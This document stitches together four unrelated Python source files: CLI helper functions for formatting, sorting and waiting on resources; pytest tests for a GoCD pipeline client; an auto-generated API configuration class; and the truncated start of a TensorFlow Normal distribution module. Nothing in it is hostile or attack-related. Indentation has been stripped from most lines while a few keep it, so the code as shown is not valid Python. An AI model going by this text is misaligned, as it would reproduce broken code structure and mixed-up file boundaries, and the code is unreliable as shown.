if field in mixed_case_fields:
field_name = field.replace(' ', '_')
else:
field_name = field.lower().replace(' ', '_')
data = getattr(item, field_name, '')
if field in formatters:
formatter = formatters[field]
if (isinstance(formatter, type) and issubclass(
formatter, cliff_columns.FormattableColumn)):
data = formatter(data)
elif callable(formatter):
warnings.warn(
'The usage of formatter functions is now discouraged. '
'Consider using cliff.columns.FormattableColumn instead. '
'See reviews linked with bug 1687955 for more detail.',
category=DeprecationWarning)
if data is not None:
data = formatter(data)
else:
msg = "Invalid formatter provided."
raise exceptions.CommandError(msg)
row.append(data)
return tuple(row)
def get_password(stdin, prompt=None, confirm=True):
message = prompt or "User Password:"
if hasattr(stdin, 'isatty') and stdin.isatty():
try:
while True:
first_pass = getpass.getpass(message)
if not confirm:
return first_pass
second_pass = getpass.getpass("Repeat " + message)
if first_pass == second_pass:
return first_pass
msg = _("The passwords entered were not the same")
print(msg)
        except EOFError:  # Ctrl-D
msg = _("Error reading password")
raise exceptions.CommandError(msg)
    msg = _("No terminal detected when attempting to read password")
raise exceptions.CommandError(msg)
def is_ascii(string):
try:
(string.decode('ascii') if isinstance(string, bytes)
else string.encode('ascii'))
return True
except (UnicodeEncodeError, UnicodeDecodeError):
return False
def read_blob_file_contents(blob_file):
try:
with open(blob_file) as file:
blob = file.read().strip()
return blob
except IOError:
msg = _("Error occurred trying to read from file %s")
raise exceptions.CommandError(msg % blob_file)
def sort_items(items, sort_str, sort_type=None):
"""Sort items based on sort keys and sort directions given by sort_str.
:param items: a list or generator object of items
:param sort_str: a string defining the sort rules, the format is
'<key1>:[direction1],<key2>:[direction2]...', direction can be 'asc'
for ascending or 'desc' for descending, if direction is not given,
it's ascending by default
    :param sort_type: if given, each sort key value is coerced to this type
        before comparison (avoids TypeError on mixed types in Python 3)
    :return: sorted items
"""
if not sort_str:
return items
# items may be a generator object, transform it to a list
items = list(items)
sort_keys = sort_str.strip().split(',')
for sort_key in reversed(sort_keys):
reverse = False
if ':' in sort_key:
sort_key, direction = sort_key.split(':', 1)
if not sort_key:
                msg = _("'<empty string>' is not a valid sort key")
raise exceptions.CommandError(msg)
if direction not in ['asc', 'desc']:
if not direction:
direction = "<empty string>"
msg = _(
"'%(direction)s' is not a valid sort direction for "
"sort key %(sort_key)s, use 'asc' or 'desc' instead"
)
raise exceptions.CommandError(msg % {
'direction': direction,
'sort_key': sort_key,
})
if direction == 'desc':
reverse = True
def f(x):
# Attempts to convert items to same 'sort_type' if provided.
# This is due to Python 3 throwing TypeError if you attempt to
# compare different types
item = get_field(x, sort_key)
if sort_type and not isinstance(item, sort_type):
try:
item = sort_type(item)
except Exception:
# Can't convert, so no sensible way to compare
item = sort_type()
return item
items.sort(key=f, reverse=reverse)
return items
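# Example (illustrative; 'servers' is any list of resources): keys are applied
# right to left, so the first key in the string has the highest priority.
#
#     sort_items(servers, 'status:asc,name:desc')
#     sort_items(servers, 'created_at:desc', sort_type=str)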
def wait_for_delete(manager,
res_id,
status_field='status',
error_status=['error'],
exception_name=['NotFound'],
sleep_time=5,
timeout=300,
callback=None):
"""Wait for resource deletion
:param manager: the manager from which we can get the resource
:param res_id: the resource id to watch
:param status_field: the status attribute in the returned resource object,
this is used to check for error states while the resource is being
deleted
:param error_status: a list of status strings for error
:param exception_name: a list of exception strings for deleted case
:param sleep_time: wait this long between checks (seconds)
:param timeout: check until this long (seconds)
:param callback: called per sleep cycle, useful to display progress; this
function is passed a progress value during each iteration of the wait
loop
:rtype: True on success, False if the resource has gone to error state or
the timeout has been reached
"""
total_time = 0
while total_time < timeout:
try:
# might not be a bad idea to re-use find_resource here if it was
# a bit more friendly in the exceptions it raised so we could just
# handle a NotFound exception here without parsing the message
res = manager.get(res_id)
except Exception as ex:
if type(ex).__name__ in exception_name:
return True
raise
status = getattr(res, status_field, '').lower()
if status in error_status:
return False
if callback:
progress = getattr(res, 'progress', None) or 0
callback(progress)
time.sleep(sleep_time)
total_time += sleep_time
# if we got this far we've timed out
return False
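# Example (illustrative; 'volume_client' is a hypothetical manager):
#
#     if not wait_for_delete(volume_client.volumes, volume_id, timeout=600):
#         raise SystemExit('volume deletion failed or timed out')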
def wait_for_status(status_f,
res_id,
status_field='status',
success_status=['active'],
error_status=['error'],
sleep_time=5,
callback=None):
"""Wait for status change on a resource during a long-running operation
:param status_f: a status function that takes a single id argument
:param res_id: the resource id to watch
:param status_field: the status attribute in the returned resource object
:param success_status: a list of status strings for successful completion
:param error_status: a list of status strings for error
:param sleep_time: wait this long (seconds)
:param callback: called per sleep cycle, useful to display progress
:rtype: True on success
"""
while True:
res = status_f(res_id)
status = getattr(res, status_field, '').lower()
if status in success_status:
retval = True
break
elif status in error_status:
retval = False
break
if callback:
progress = getattr(res, 'progress', None) or 0
callback(progress)
time.sleep(sleep_time)
return retval
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# The MIT License
#
# Copyright (c) 2016 Grigory Chernyshev
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import hashlib
import time
import mock
import pytest
from six import string_types
from tests import AbstractTestManager, ConfirmHeaderMixin, RequestContentTypeHeadersMixin, ReturnValueMixin
from yagocd.exception import RequestError
from yagocd.resources import material
from yagocd.resources import pipeline
from yagocd.resources import stage
@pytest.fixture()
def manager(session_fixture):
return pipeline.PipelineManager(session=session_fixture)
class BaseTestPipelineManager(object):
@staticmethod
def get_suffix(*args):
m = hashlib.md5()
m.update('|'.join([str(x) for x in args]).encode('utf-8'))
        return m.hexdigest()[:8]
@pytest.fixture()
def mock_manager(self, mock_session):
return pipeline.PipelineManager(session=mock_session)
class TestList(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/pipeline_list") as cass:
return cass, manager.list()
@pytest.fixture()
def expected_request_url(self):
return '/go/api/config/pipeline_groups'
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return list
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
assert len(result) > 0
assert all(isinstance(i, pipeline.PipelineEntity) for i in result)
return check_value
@mock.patch('yagocd.util.YagocdUtil.build_graph')
def test_build_graph_is_called(self, mock_build_graph, manager, my_vcr):
self._execute_test_action(manager, my_vcr)
mock_build_graph.assert_called()
class TestFind(TestList):
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr, name=''):
with my_vcr.use_cassette("pipeline/pipeline_list") as cass:
return cass, manager.find(name)
@pytest.fixture()
def expected_return_type(self):
return None
@pytest.fixture()
def expected_return_value(self):
return None
@mock.patch('yagocd.resources.pipeline.PipelineManager.list')
def test_list_is_called(self, mock_list, manager):
manager.find(mock.MagicMock())
mock_list.assert_called()
def test_find_non_existing(self, manager, my_vcr):
name = 'This_Pipeline_Doesnt_Exists'
cass, result = self._execute_test_action(manager, my_vcr, name)
assert result is None
def test_find_returns_pipeline_entity(self, manager, my_vcr):
name = 'Production_Services'
cass, result = self._execute_test_action(manager, my_vcr, name)
assert isinstance(result, pipeline.PipelineEntity)
def test_find_returns_entity_with_same_name(self, manager, my_vcr):
name = 'Production_Services'
cass, result = self._execute_test_action(manager, my_vcr, name)
assert result.data.name == name
class TestHistory(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
NAME = 'Consumer_Website'
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/history_Consumer_Website") as cass:
return cass, manager.history(self.NAME)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/history/{offset}'.format(name=self.NAME, offset=0)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return list
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
assert len(result) > 0
assert all(isinstance(i, pipeline.PipelineInstance) for i in result)
assert all(i.data.name == self.NAME for i in result)
return check_value
def test_non_existing_history_raises_http_error(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/history_non_existing") as cass:
with pytest.raises(RequestError):
return cass, manager.history("pipeline_non_existing")
class TestFullHistory(BaseTestPipelineManager):
@mock.patch('yagocd.resources.pipeline.PipelineManager.history')
def test_history_is_called(self, history_mock, mock_manager):
history_mock.side_effect = [['foo', 'bar', 'baz'], []]
name = "Consumer_Website"
list(mock_manager.full_history(name))
calls = [mock.call(name, 0), mock.call(name, 3)]
history_mock.assert_has_calls(calls)
class TestLast(BaseTestPipelineManager):
@mock.patch('yagocd.resources.pipeline.PipelineManager.history')
def test_history_is_called(self, history_mock, mock_manager):
name = "Consumer_Website"
mock_manager.last(name)
history_mock.assert_called_with(name=name)
@mock.patch('yagocd.resources.pipeline.PipelineManager.history')
def test_last_return_last(self, history_mock, mock_manager):
history_mock.return_value = ['foo', 'bar', 'baz']
assert mock_manager.last(mock.MagicMock()) == 'foo'
class TestGet(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
NAME = "Consumer_Website"
COUNTER = 2
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/get_Consumer_Website") as cass:
return cass, manager.get(self.NAME, self.COUNTER)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/instance/{counter}'.format(
name=self.NAME, counter=self.COUNTER
)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return pipeline.PipelineInstance
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
assert result.data.name == self.NAME
return check_value
def test_get_non_existing(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/get_non_existing"):
with pytest.raises(RequestError):
manager.get("pipeline_instance_non_existing", 1)
class TestStatus(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
NAME = "UnPausedPipeline"
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/status_{}".format(self.NAME)) as cass:
return cass, manager.status(self.NAME)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/status'.format(name=self.NAME)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return dict
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
expected_items = {'paused': False, 'schedulable': True, 'locked': False}
for name, value in expected_items.items():
assert result[name] == value
return check_value
class TestPause(BaseTestPipelineManager, AbstractTestManager, ConfirmHeaderMixin):
NAME = 'UnPausedPipeline'
REASON = 'Test pause reason'
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/pause_{}".format(self.NAME)) as cass:
return cass, manager.pause(self.NAME, self.REASON)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/pause'.format(name=self.NAME)
@pytest.fixture()
def expected_request_method(self):
return 'POST'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
def test_pause(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/pause_{}_complex".format(self.NAME)):
manager.unpause(self.NAME)
result = manager.pause(self.NAME, self.REASON)
assert result is None
expected_items = {'paused': True, 'schedulable': False, 'locked': False}
status = manager.status(self.NAME)
for item_name, value in expected_items.items():
assert status[item_name] == value
manager.unpause(self.NAME)
class TestUnpause(BaseTestPipelineManager, AbstractTestManager, ConfirmHeaderMixin):
NAME = "PausedPipeline"
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/unpause_{}".format(self.NAME)) as cass:
return cass, manager.unpause(self.NAME)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/unpause'.format(name=self.NAME)
@pytest.fixture()
def expected_request_method(self):
return 'POST'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
def test_unpause(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/unpause_{}_complex".format(self.NAME)):
manager.pause(self.NAME, '')
result = manager.unpause(self.NAME)
assert result is None
expected_items = {'paused': False, 'schedulable': True, 'locked': False}
status = manager.status(self.NAME)
for name, value in expected_items.items():
assert status[name] == value
class TestReleaseLock(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin, ConfirmHeaderMixin):
NAME = "Deploy_UAT"
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/release_lock") as cass:
return cass, manager.release_lock(self.NAME)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/releaseLock'.format(name=self.NAME)
@pytest.fixture()
def expected_request_method(self):
return 'POST'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return string_types
@pytest.fixture()
def expected_return_value(self):
return 'pipeline lock released for {0}\n'.format(self.NAME)
@pytest.mark.parametrize("variables", [None, {'MY_VARIABLE': 'some value'}])
@pytest.mark.parametrize("secure_variables", [None, {'MY_SECRET_VARIABLE': 'secret variable'}])
class TestSchedule(
BaseTestPipelineManager,
AbstractTestManager,
RequestContentTypeHeadersMixin,
ReturnValueMixin,
ConfirmHeaderMixin
):
NAME = "TestSchedule"
@pytest.fixture()
def suffix(self, variables, secure_variables):
return self.get_suffix(variables, secure_variables)
@pytest.fixture()
def _execute_test_action(self, suffix, variables, secure_variables, manager, my_vcr):
with my_vcr.use_cassette("pipeline/schedule-{0}".format(suffix)) as cass:
return cass, manager.schedule(
name='{0}-{1}'.format(self.NAME, suffix),
variables=variables,
secure_variables=secure_variables
)
@pytest.fixture()
def expected_request_url(self, suffix, variables, secure_variables):
return '/go/api/pipelines/{name}/schedule'.format(
name='{0}-{1}'.format(self.NAME, suffix)
)
@pytest.fixture()
def expected_request_method(self):
return 'POST'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_content_type_headers(self, *args, **kwargs):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return string_types
@pytest.fixture()
def expected_return_value(self, suffix):
return 'Request to schedule pipeline {0}-{1} accepted\n'.format(self.NAME, suffix)
    # Have to override and call super, as the parametrize decorators are applied
    # to the class and therefore to its parent classes as well. Because two classes
    # receive the same parameters, py.test raises `ValueError: duplicate 'variables'`.
def test_request_url(self, _execute_test_action, expected_request_url):
return super(self.__class__, self).test_request_url(_execute_test_action, expected_request_url)
def test_request_method(self, _execute_test_action, expected_request_method):
return super(self.__class__, self).test_request_method(_execute_test_action, expected_request_method)
def test_request_accept_headers(self, _execute_test_action, expected_accept_headers):
return super(self.__class__, self).test_request_accept_headers(_execute_test_action, expected_accept_headers)
def test_response_code(self, _execute_test_action, expected_response_code):
return 202
def test_update_request_content_type_headers(self, _execute_test_action, expected_content_type_headers):
return super(self.__class__, self).test_update_request_content_type_headers(
_execute_test_action, expected_content_type_headers)
def test_return_type(self, _execute_test_action, expected_return_type):
return super(self.__class__, self).test_return_type(_execute_test_action, expected_return_type)
def test_return_value(self, _execute_test_action, expected_return_value):
return super(self.__class__, self).test_return_value(_execute_test_action, expected_return_value)
def test_confirm_header(self, _execute_test_action):
return super(self.__class__, self).test_confirm_header(_execute_test_action)
@pytest.mark.parametrize("variables", [None, {'MY_VARIABLE': 'some value'}])
@pytest.mark.parametrize("secure_variables", [None, {'MY_SECRET_VARIABLE': 'secret variable'}])
class TestScheduleWithInstance(
BaseTestPipelineManager,
AbstractTestManager,
ReturnValueMixin
):
EXPECTED_CASSETTE_COUNT = None
NAME = "TestScheduleWithInstance"
variables = [None, {'MY_VARIABLE': 'some value'}]
secure_variables = [None, {'MY_SECRET_VARIABLE': 'secret variable'}]
@pytest.fixture()
def suffix(self, variables, secure_variables):
return self.get_suffix(variables, secure_variables)
@pytest.fixture()
def pipeline_name(self, suffix):
return '{0}-{1}'.format(self.NAME, suffix)
@pytest.fixture()
def _execute_test_action(self, suffix, pipeline_name, variables, secure_variables, manager, my_vcr):
with my_vcr.use_cassette("pipeline/schedule-instance-{0}".format(suffix)) as cass:
if not len(cass.requests):
with my_vcr.use_cassette("pipeline/schedule-instance-prepare-{0}".format(suffix)):
pipeline_instance = manager.last(pipeline_name)
while pipeline_instance and not pipeline_instance.data.can_run:
print("Sleeping...") # noqa
time.sleep(10)
pipeline_instance = manager.last(pipeline_name)
backoff = 4
max_tries = 50
else:
backoff = 0
max_tries = 20
return cass, manager.schedule_with_instance(
name=pipeline_name,
variables=variables,
secure_variables=secure_variables,
backoff=backoff,
max_tries=max_tries
)
@pytest.fixture()
def expected_request_url(self, suffix, variables, secure_variables):
return '/go/api/pipelines/{name}/history/0'.format(
name='{0}-{1}'.format(self.NAME, suffix)
)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return pipeline.PipelineInstance
@pytest.fixture()
def expected_return_value(self, suffix):
pytest.skip()
    # Have to override and call super, as the parametrize decorators are applied
    # to the class and therefore to its parent classes as well. Because two classes
    # receive the same parameters, py.test raises `ValueError: duplicate 'variables'`.
def test_request_url(self, _execute_test_action, expected_request_url):
return super(self.__class__, self).test_request_url(_execute_test_action, expected_request_url)
def test_request_method(self, _execute_test_action, expected_request_method):
return super(self.__class__, self).test_request_method(_execute_test_action, expected_request_method)
def test_request_accept_headers(self, _execute_test_action, expected_accept_headers):
return super(self.__class__, self).test_request_accept_headers(_execute_test_action, expected_accept_headers)
def test_response_code(self, _execute_test_action, expected_response_code):
return super(self.__class__, self).test_response_code(_execute_test_action, expected_response_code)
def test_return_type(self, _execute_test_action, expected_return_type):
return super(self.__class__, self).test_return_type(_execute_test_action, expected_return_type)
def test_return_value(self, _execute_test_action, expected_return_value):
return super(self.__class__, self).test_return_value(_execute_test_action, expected_return_value)
class TestValueStreamMap(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
NAME = 'Automated_Tests'
COUNTER = 7
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/value_stream_map") as cass:
return cass, manager.value_stream_map(self.NAME, self.COUNTER)
@pytest.fixture()
def expected_request_url(self):
return '/go/pipelines/value_stream_map/{name}/{counter}.json'.format(name=self.NAME, counter=self.COUNTER)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return list
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
assert len(result) > 0
assert all(isinstance(i, (pipeline.PipelineInstance, material.ModificationEntity)) for i in result)
return check_value
def test_stages(self, _execute_test_action):
_, result = _execute_test_action
assert any(isinstance(i, pipeline.PipelineInstance) for i in result)
assert any(isinstance(i, material.ModificationEntity) for i in result)
for item in result:
assert hasattr(item, 'data')
if isinstance(item, pipeline.PipelineInstance):
assert all(isinstance(s, dict) for s in item.data.stages)
assert all(isinstance(s, stage.StageInstance) for s in item.stages())
elif isinstance(item, material.ModificationEntity):
                assert hasattr(item.data, 'user')
                assert hasattr(item.data, 'type')
                assert hasattr(item.data, 'comment')
                assert hasattr(item.data, 'revision')
class TestMagicMethods(object):
@mock.patch('yagocd.resources.pipeline.PipelineManager.find')
def test_indexed_based_access(self, find_mock, manager):
name = mock.MagicMock()
_ = manager[name] # noqa
find_mock.assert_called_once_with(name=name)
@mock.patch('yagocd.resources.pipeline.PipelineManager.list')
def test_iterator_access(self, list_mock, manager):
for _ in manager:
pass
list_mock.assert_called_once_with()
|
|
# coding: utf-8
"""
Tts API
Description # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import logging
import multiprocessing
import sys
import urllib3
import six
from six.moves import http_client as httplib
class Configuration(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
:param host: Base url
:param api_key: Dict to store API key(s).
Each entry in the dict specifies an API key.
The dict key is the name of the security scheme in the OAS specification.
The dict value is the API key secret.
:param api_key_prefix: Dict to store API prefix (e.g. Bearer)
The dict key is the name of the security scheme in the OAS specification.
The dict value is an API key prefix when generating the auth data.
:param username: Username for HTTP basic authentication
:param password: Password for HTTP basic authentication
:Example:
API Key Authentication Example.
Given the following security scheme in the OpenAPI specification:
components:
securitySchemes:
cookieAuth: # name for the security scheme
type: apiKey
in: cookie
name: JSESSIONID # cookie name
You can programmatically set the cookie:
conf = telestream_cloud_tts.Configuration(
        api_key={'cookieAuth': 'abc123'},
api_key_prefix={'cookieAuth': 'JSESSIONID'}
)
The following cookie will be added to the HTTP request:
Cookie: JSESSIONID abc123
"""
def __init__(self, host="https://api.cloud.telestream.net/tts/v1.0",
api_key=None, api_key_prefix=None,
username=None, password=None,
):
"""Constructor
"""
self.host = host
"""Default Base url
"""
self.temp_folder_path = None
"""Temp file folder for downloading files
"""
# Authentication Settings
self.api_key = {}
if api_key:
self.api_key = api_key
"""dict to store API key(s)
"""
self.api_key_prefix = {}
if api_key_prefix:
self.api_key_prefix = api_key_prefix
"""dict to store API prefix (e.g. Bearer)
"""
self.refresh_api_key_hook = None
"""function hook to refresh API key if expired
"""
self.username = username
"""Username for HTTP basic authentication
"""
self.password = password
"""Password for HTTP basic authentication
"""
self.logger = {}
"""Logging Settings
"""
self.logger["package_logger"] = logging.getLogger("telestream_cloud_tts")
self.logger["urllib3_logger"] = logging.getLogger("urllib3")
self.logger_format = '%(asctime)s %(levelname)s %(message)s'
"""Log format
"""
self.logger_stream_handler = None
"""Log stream handler
"""
self.logger_file_handler = None
"""Log file handler
"""
self.logger_file = None
"""Debug file location
"""
self.debug = False
"""Debug switch
"""
self.verify_ssl = True
"""SSL/TLS verification
Set this to false to skip verifying SSL certificate when calling API
from https server.
"""
self.ssl_ca_cert = None
"""Set this to customize the certificate file to verify the peer.
"""
self.cert_file = None
"""client certificate file
"""
self.key_file = None
"""client key file
"""
self.assert_hostname = None
"""Set this to True/False to enable/disable SSL hostname verification.
"""
self.connection_pool_maxsize = multiprocessing.cpu_count() * 5
"""urllib3 connection pool's maximum number of connections saved
per pool. urllib3 uses 1 connection as default value, but this is
not the best value when you are making a lot of possibly parallel
requests to the same host, which is often the case here.
cpu_count * 5 is used as default value to increase performance.
"""
self.proxy = None
"""Proxy URL
"""
self.proxy_headers = None
"""Proxy headers
"""
self.safe_chars_for_path_param = ''
"""Safe chars for path_param
"""
self.retries = None
"""Adding retries to override urllib3 default value 3
"""
# Disable client side validation
self.client_side_validation = True
@property
def logger_file(self):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
return self.__logger_file
@logger_file.setter
def logger_file(self, value):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
self.__logger_file = value
if self.__logger_file:
# If set logging file,
# then add file handler and remove stream handler.
self.logger_file_handler = logging.FileHandler(self.__logger_file)
self.logger_file_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_file_handler)
@property
def debug(self):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
return self.__debug
@debug.setter
def debug(self, value):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
self.__debug = value
if self.__debug:
# if debug status is True, turn on debug logging
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.DEBUG)
# turn on httplib debug
httplib.HTTPConnection.debuglevel = 1
else:
# if debug status is False, turn off debug logging,
# setting log level to default `logging.WARNING`
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.WARNING)
# turn off httplib debug
httplib.HTTPConnection.debuglevel = 0
@property
def logger_format(self):
"""The logger format.
The logger_formatter will be updated when logger_format is set.
:param value: The format string.
:type: str
"""
return self.__logger_format
@logger_format.setter
def logger_format(self, value):
"""The logger format.
The logger_formatter will be updated when logger_format is set.
:param value: The format string.
:type: str
"""
self.__logger_format = value
self.logger_formatter = logging.Formatter(self.__logger_format)
def get_api_key_with_prefix(self, identifier):
"""Gets API key (with prefix if set).
:param identifier: The identifier of apiKey.
:return: The token for api key authentication.
"""
if self.refresh_api_key_hook is not None:
self.refresh_api_key_hook(self)
key = self.api_key.get(identifier)
if key:
prefix = self.api_key_prefix.get(identifier)
if prefix:
return "%s %s" % (prefix, key)
else:
return key
def get_basic_auth_token(self):
"""Gets HTTP basic authentication header (string).
:return: The token for basic HTTP authentication.
"""
username = ""
if self.username is not None:
username = self.username
password = ""
if self.password is not None:
password = self.password
return urllib3.util.make_headers(
basic_auth=username + ':' + password
).get('authorization')
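# Illustrative note (not part of the generated client): with username='user'
# and password='pass', get_basic_auth_token() returns the urllib3-built header
# value 'Basic dXNlcjpwYXNz' (base64 of 'user:pass').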
def auth_settings(self):
"""Gets Auth Settings dict for api client.
:return: The Auth Settings information dict.
"""
auth = {}
if 'X-Api-Key' in self.api_key:
auth['apiKey'] = {
'type': 'api_key',
'in': 'header',
'key': 'X-Api-Key',
'value': self.get_api_key_with_prefix('X-Api-Key')
}
return auth
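# Illustrative note (assumed credentials): configuring the client with
# api_key={'X-Api-Key': 'secret'} makes auth_settings() return
# {'apiKey': {'type': 'api_key', 'in': 'header', 'key': 'X-Api-Key',
#             'value': 'secret'}}, i.e. requests send an 'X-Api-Key' header.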
def to_debug_report(self):
"""Gets the essential information for debugging.
:return: The report for debugging.
"""
return "Python SDK Debug Report:\n"\
"OS: {env}\n"\
"Python Version: {pyversion}\n"\
"Version of the API: 2.0.0\n"\
"SDK Package Version: 2.1.0".\
format(env=sys.platform, pyversion=sys.version)
def get_host_settings(self):
"""Gets an array of host settings
:return: An array of host settings
"""
return [
{
'url': "https://api.cloud.telestream.net/tts/v1.0",
'description': "No description provided",
}
]
def get_host_from_settings(self, index, variables=None):
"""Gets host URL based on the index and variables
:param index: array index of the host settings
:param variables: hash of variable and the corresponding value
:return: URL based on host settings
"""
variables = {} if variables is None else variables
servers = self.get_host_settings()
try:
server = servers[index]
except IndexError:
raise ValueError(
"Invalid index {0} when selecting the host settings. "
"Must be less than {1}".format(index, len(servers)))
url = server['url']
# go through variables and replace placeholders
for variable_name, variable in server.get('variables', {}).items():
used_value = variables.get(
variable_name, variable['default_value'])
if 'enum_values' in variable \
and used_value not in variable['enum_values']:
raise ValueError(
"The variable `{0}` in the host URL has invalid value "
"{1}. Must be {2}.".format(
variable_name, used_value,
variable['enum_values']))
url = url.replace("{" + variable_name + "}", used_value)
return url
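# Illustrative note (hypothetical server entry, not in the settings above):
# for {'url': 'https://{region}.example.com',
#      'variables': {'region': {'default_value': 'us',
#                               'enum_values': ['us', 'eu']}}},
# get_host_from_settings(0, variables={'region': 'eu'}) would return
# 'https://eu.example.com'. The single server defined above declares no
# variables, so get_host_from_settings(0) simply returns its URL unchanged.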
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Normal (Gaussian) distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from tensorflow.contrib.bayesflow.python.ops import special_math
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import kullback_leibler
from tensorflow.contrib.framework.python.framework import tensor_util as contrib_tensor_util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
class Normal(distribution.Distribution):
"""The scalar Normal distribution with mean and stddev parameters mu, sigma.
#### Mathematical details
The PDF of this distribution is:
```f(x) = sqrt(1/(2*pi*sigma^2)) exp(-(x-mu)^2/(2*sigma^2))```
#### Examples
Examples of initialization of one or a batch of distributions.
```python
# Define a single scalar Normal distribution.
dist = tf.contrib.distributions.Normal(mu=0., sigma=3.)
# Evaluate the cdf at 1, returning a scalar.
dist.cdf(1.)
# Define a batch of two scalar valued Normals.
# The first has mean 1 and standard deviation 11, the second 2 and 22.
dist = tf.contrib.distributions.Normal(mu=[1, 2.], sigma=[11, 22.])
